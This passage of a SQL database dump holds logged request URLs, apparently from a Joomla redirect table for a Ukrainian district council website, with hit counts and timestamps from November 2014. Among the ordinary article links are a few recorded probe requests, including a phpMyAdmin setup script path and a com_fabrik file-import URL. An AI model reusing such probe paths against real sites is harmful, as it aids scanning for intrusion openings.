00:00:00',301),(11220,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1162:2013-12-19-06-13-29&lang=uk&option=com_content&view=article','','','',5,0,'2014-11-19 20:19:57','0000-00-00 00:00:00',301),(11221,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1184:----27----6-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-19 21:41:05','0000-00-00 00:00:00',301),(11222,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1228:2014-02-27-14-42-41&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-19 21:54:14','0000-00-00 00:00:00',301),(11223,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=1106:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-19 21:54:17','0000-00-00 00:00:00',301),(11224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1360:-------qq&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-19 23:15:36','0000-00-00 00:00:00',301),(11225,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-19 23:15:49','0000-00-00 00:00:00',301),(11226,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1354:-lr-&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-19 23:28:23','0000-00-00 00:00:00',301),(11227,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48&id=961:2013-03-11-10-51-56&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-20 00:29:40','0000-00-00 00:00:00',301),(11228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1276:2014-04-10-13-26-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 02:24:02','0000-00-00 00:00:00',301),(11229,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1299:-lr-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 03:37:06','0000-00-00 00:00:00',301),(11230,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-20 03:58:57','0000-00-00 00:00:00',301),(11231,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1359:2014-07-07-08-13-48&lang=uk&option=com_content&view=article','','','',3,0,'2014-11-20 04:10:22','0000-00-00 00:00:00',301),(11232,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1027:-2013-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 04:10:34','0000-00-00 00:00:00',301),(11233,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1251:2014-03-24-07-11-22&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 05:44:35','0000-00-00 00:00:00',301),(11234,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1201:2014-01-31-07-43-11&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-20 05:44:38','0000-00-00 00:00:00',301),(11235,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1014:2013-06-03-06-43-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 07:08:26','0000-00-00 00:00:00',301),(11236,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=840:-2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-20 08:17:43','0000-00-00 00:00:00',301),(11237,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1113:2013-10-23-09-26-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-20 10:18:04','0000-00-00 00:00:00',301),(11238,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1377:-23-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-20 11:07:36','0000-00-00 00:00:00',301),(11239,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-20 11:35:05','0000-00-00 00:00:00',301),(11240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-20 11:35:17','0000-00-00 00:00:00',301),(11241,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-20 12:13:30','0000-00-00 00:00:00',301),(11242,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-20 12:14:01','0000-00-00 00:00:00',301),(11243,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:------------2010-2015-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-11-20 12:14:19','0000-00-00 00:00:00',301),(11244,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-20 12:15:13','0000-00-00 00:00:00',301),(11245,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1229:2014-02-28-09-49-28&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 13:25:43','0000-00-00 00:00:00',301),(11246,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1004:2013-05-04-11-41-00&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 13:25:49','0000-00-00 00:00:00',301),(11247,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1061:2013-07-29-08-58-16&lang=en&option=com_content&view=article','','','',1,0,'2014-11-20 13:25:51','0000-00-00 00:00:00',301),(11248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-11-20 14:02:14','0000-00-00 00:00:00',301),(11249,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1256:2014-03-27-17-22-43&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 14:53:19','0000-00-00 00:00:00',301),(11250,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1359:2014-07-07-08-13-48&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-20 15:20:31','0000-00-00 00:00:00',301),(11251,'http://malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1378:2014-08-27-11-29-34&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2014-11-20 15:20:36','0000-00-00 00:00:00',301),(11252,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1143:2013-11-26-13-23-37&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 16:05:50','0000-00-00 00:00:00',301),(11253,'http://malyn-rayrada.org.ua/index.php?Itemid=7&id=3:2010-06-05-12-50-56&lang=uk&layout=blog&option=com_content&view=category','','','',4,0,'2014-11-20 16:05:55','0000-00-00 00:00:00',301),(11254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47&Itemid=86&lang=uk','','','',1,0,'2014-11-20 17:35:14','0000-00-00 00:00:00',301),(11255,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1038:2013-06-28-10-19-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 17:39:44','0000-00-00 00:00:00',301),(11256,'http://www.malyn-rayrada.org.ua/bdsite-cards/index.php','','','',1,0,'2014-11-20 18:28:44','0000-00-00 00:00:00',301),(11257,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=980:2013-03-31-08-20-42&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-20 19:13:11','0000-00-00 00:00:00',301),(11258,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1224:----25--2014-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-20 19:13:13','0000-00-00 00:00:00',301),(11259,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=990:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-20 19:32:26','0000-00-00 00:00:00',301),(11260,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1073:2013-08-30-11-12-19&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-20 21:04:17','0000-00-00 00:00:00',301),(11261,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1212:2014-02-07-07-01-38&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-20 22:20:25','0000-00-00 00:00:00',301),(11262,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1063:2013-08-02-17-32-04&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 22:35:33','0000-00-00 00:00:00',301),(11263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=968:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 23:53:33','0000-00-00 00:00:00',301),(11264,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1122:-1-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-20 23:53:44','0000-00-00 00:00:00',301),(11265,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1325:2014-05-29-06-00-31&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-21 00:07:09','0000-00-00 00:00:00',301),(11266,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=987:2013-04-15-06-06-41&lang=en&option=com_content&view=article','','','',1,0,'2014-11-21 03:00:28','0000-00-00 00:00:00',301),(11267,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1328:2014-06-01-11-58-56&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-21 03:00:45','0000-00-00 00:00:00',301),(11268,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1189:2014-01-28-09-46-45&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-21 03:00:47','0000-00-00 00:00:00',301),(11269,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1361:-32-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 04:34:23','0000-00-00 00:00:00',301),(11270,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&lang=ru&option=com_content&view=article','','','',5,0,'2014-11-21 07:41:42','0000-00-00 00:00:00',301),(11271,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1104:------------------lr&lang=ru&option=com_content&view=article','','','',2,0,'2014-11-21 07:41:44','0000-00-00 00:00:00',301),(11272,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1309:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-11-21 09:15:22','0000-00-00 00:00:00',301),(11273,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1149:2013-11-28-14-51-59&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 09:15:24','0000-00-00 00:00:00',301),(11274,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1072:-24-6-&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-21 09:17:05','0000-00-00 00:00:00',301),(11275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-11-21 10:00:25','0000-00-00 00:00:00',301),(11276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-11-21 10:00:50','0000-00-00 00:00:00',301),(11277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-11-21 10:03:16','0000-00-00 00:00:00',301),(11278,'http://www.malyn-rayrada.org.ua/index.php/907-do-vidoma-deputativ-rajonnoji-radi','','','',36,0,'2014-11-21 10:35:52','0000-00-00 00:00:00',301),(11279,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1372:2014-08-04-19-26-16&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 10:49:01','0000-00-00 00:00:00',301),(11280,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 10:49:08','0000-00-00 00:00:00',301),(11281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-21 11:10:03','0000-00-00 00:00:00',301),(11282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-21 11:10:11','0000-00-00 00:00:00',301),(11283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-21 11:10:15','0000-00-00 00:00:00',301),(11284,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-21 13:44:30','0000-00-00 00:00:00',301),(11285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru','','','',3,0,'2014-11-21 15:01:43','0000-00-00 00:00:00',301),(11286,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=999:2013-04-28-05-21-05&lang=en&option=com_content&view=article','','','',1,0,'2014-11-21 15:13:38','0000-00-00 00:00:00',301),(11287,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1074:2013-09-02-05-02-30&lang=ru&option=com_content&view=article','','','',4,0,'2014-11-21 15:22:45','0000-00-00 00:00:00',301),(11288,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1245:2014-03-17-17-23-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-21 15:30:22','0000-00-00 00:00:00',301),(11289,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1128:2013-11-06-13-04-56&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 17:03:39','0000-00-00 00:00:00',301),(11290,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1083:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 17:03:42','0000-00-00 00:00:00',301),(11291,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=984:-20-&lang=en&option=com_content&view=article','','','',5,0,'2014-11-21 17:03:45','0000-00-00 00:00:00',301),(11292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=3&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-11-21 17:03:52','0000-00-00 00:00:00',301),(11293,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&lang=uk&layout=default&page&print=1&tmpl=component&','',3,0,'2014-11-21 18:52:29','0000-00-00 00:00:00',301),(11294,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1189:2014-01-28-09-46-45&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-21 20:10:56','0000-00-00 00:00:00',301),(11295,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1336:2014-06-10-11-01-06&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-21 21:28:14','0000-00-00 00:00:00',301),(11296,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1364:-------------2012-2015-&lang=uk&option=com_content&view=article','','','',4,0,'2014-11-21 23:18:28','0000-00-00 00:00:00',301),(11297,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1265:2014-04-01-11-43-46&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-22 04:55:31','0000-00-00 00:00:00',301),(11298,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1362:-------2015-----------&lang=ru&option=com_content&view=article','','','',3,0,'2014-11-22 04:55:36','0000-00-00 00:00:00',301),(11299,'http://www.malyn-rayrada.org.ua/index.php?Itemid=8&id=4&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2014-11-22 06:26:54','0000-00-00 00:00:00',301),(11300,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1348:2014-06-20-13-13-51&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-22 06:36:43','0000-00-00 00:00:00',301),(11301,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1040:2013-07-01-14-27-50&lang=uk&option=com_content&view=article','','','',1,0,'2014-11-22 06:58:56','0000-00-00 00:00:00',301),(11302,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1035:2013-06-25-09-55-31&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-22 07:58:00','0000-00-00 00:00:00',301),(11303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-22 09:54:44','0000-00-00 00:00:00',301),(11304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1254:-1-50&lang=en&option=com_content&view=article','','','',3,0,'2014-11-22 10:01:23','0000-00-00 00:00:00',301),(11305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1196:2014-01-30-14-12-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-22 10:01:26','0000-00-00 00:00:00',301),(11306,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1352:2014-06-26-06-51-20&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-23 02:40:14','0000-00-00 00:00:00',301),(11307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en&Itemid=','','','',4,0,'2014-11-23 04:35:35','0000-00-00 00:00:00',301),(11308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=en&Itemid=0','','','',14,0,'2014-11-23 04:45:27','0000-00-00 00:00:00',301),(11309,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1321:-lr-&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-23 05:42:19','0000-00-00 00:00:00',301),(11310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-11-23 14:27:00','0000-00-00 00:00:00',301),(11311,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1347:2014-06-19-11-19-16&lang=ru&option=com_content&view=article','','','',1,0,'2014-11-23 16:20:15','0000-00-00 00:00:00',301),(11312,'http://malyn-rayrada.org.ua/phpMyAdmin/scripts/setup.php','','','',6,0,'2014-11-24 03:26:38','0000-00-00 00:00:00',301),(11313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-24 03:46:57','0000-00-00 00:00:00',301),(11314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&Itemid=14&lang=en','','','',9,0,'2014-11-24 09:22:09','0000-00-00 00:00:00',301),(11315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-11-24 12:04:18','0000-00-00 00:00:00',301),(11316,'http://www.malyn-rayrada.org.ua/images/stories/apteka28_12','','http://www.malyn-rayrada.org.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2014-11-24 13:22:28','0000-00-00 00:00:00',301),(11317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-11-24 18:27:14','0000-00-00 00:00:00',301),(11318,'http://www.malyn-rayrada.org.ua/index.php/918-shchodo-orendi-komunalnogo-majna','','','',32,0,'2014-11-24 23:54:40','0000-00-00 00:00:00',301),(11319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-11-25 02:33:52','0000-00-00 00:00:00',301),(11320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-11-25 04:02:29','0000-00-00 00:00:00',301),(11321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:--------25--2013--464-l-----------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-11-25 06:25:55','0000-00-00 00:00:00',301),(11322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1045:------21--2012---354&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-11-25 07:46:13','0000-00-00 00:00:00',301),(11323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-25 09:01:12','0000-00-00 00:00:00',301),(11324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-25 09:01:45','0000-00-00 00:00:00',301),(11325,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1373:2014-08-07-11-39-57&tmpl=component&print=1&layout=default&page=&lang=uk','','','',8,0,'2014-11-25 11:06:55','0000-00-00 00:00:00',301),(11326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-11-25 15:11:57','0000-00-00 00:00:00',301),(11327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=en&Itemid=','','','',3,0,'2014-11-25 15:18:30','0000-00-00 00:00:00',301),(11328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-11-25 15:18:46','0000-00-00 00:00:00',301),(11329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36&Itemid=70&lang=en','','','',1,0,'2014-11-25 15:19:42','0000-00-00 00:00:00',301),(11330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-11-25 15:19:59','0000-00-00 00:00:00',301),(11331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-11-25 21:39:41','0000-00-00 00:00:00',301),(11332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-11-25 21:45:57','0000-00-00 00:00:00',301),(11333,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1126:2013-10-31-12-52-35&lang=uk&layout=default&option=com_content','',3,0,'2014-11-25 22:35:00','0000-00-00 00:00:00',301),(11334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-11-26 07:02:51','0000-00-00 00:00:00',301),(11335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4&layout=blog&Itemid=8&lang=ru','','','',1,0,'2014-11-26 09:55:15','0000-00-00 00:00:00',301),(11336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-11-26 10:33:05','0000-00-00 00:00:00',301),(11337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10&Itemid=17&lang=en','','','',5,0,'2014-11-26 11:51:32','0000-00-00 00:00:00',301),(11338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-11-26 13:48:43','0000-00-00 00:00:00',301),(11339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-11-26 14:48:09','0000-00-00 00:00:00',301),(11340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',18,0,'2014-11-26 17:27:10','0000-00-00 00:00:00',301),(11341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-11-26 18:53:09','0000-00-00 00:00:00',301),(11342,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1131:9-------&lang=uk&layout=default&option=com_content&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1131:9-------&lang=uk&layout=default&option=com_content&page&print','',2,0,'2014-11-26 18:59:16','0000-00-00 00:00:00',301),(11343,'http://www.malyn-rayrada.org.ua/esperanzaaguirre/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-11-26 19:43:39','0000-00-00 00:00:00',301),(11344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-11-26 20:44:14','0000-00-00 00:00:00',301),(11345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-11-27 10:06:06','0000-00-00 00:00:00',301),(11346,'http://www.malyn-rayrada.org.ua/index.php/rishennya-vid-26-11-2014-roku','','','',1,0,'2014-11-27 13:18:16','0000-00-00 00:00:00',301),(11347,'http://malyn-rayrada.org.ua/index.php/922-do-vidoma-deputativ-rajonnoji-radi-informatsiya-shchodo-provedennya-postijnikh-komisij','','','',4,0,'2014-11-28 08:21:20','0000-00-00 00:00:00',301),(11348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en&Itemid=','','','',1,0,'2014-11-28 08:52:52','0000-00-00 00:00:00',301),(11349,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11&lang=en&Itemid=0','','','',5,0,'2014-11-28 09:01:34','0000-00-00 00:00:00',301),(11350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=36&Itemid=70&lang=ru','','','',8,0,'2014-11-28 09:57:18','0000-00-00 00:00:00',301),(11351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-11-28 10:07:18','0000-00-00 00:00:00',301),(11352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-28 10:08:16','0000-00-00 00:00:00',301),(11353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-28 10:08:58','0000-00-00 00:00:00',301),(11354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-11-28 10:09:03','0000-00-00 00:00:00',301),(11355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-28 10:09:06','0000-00-00 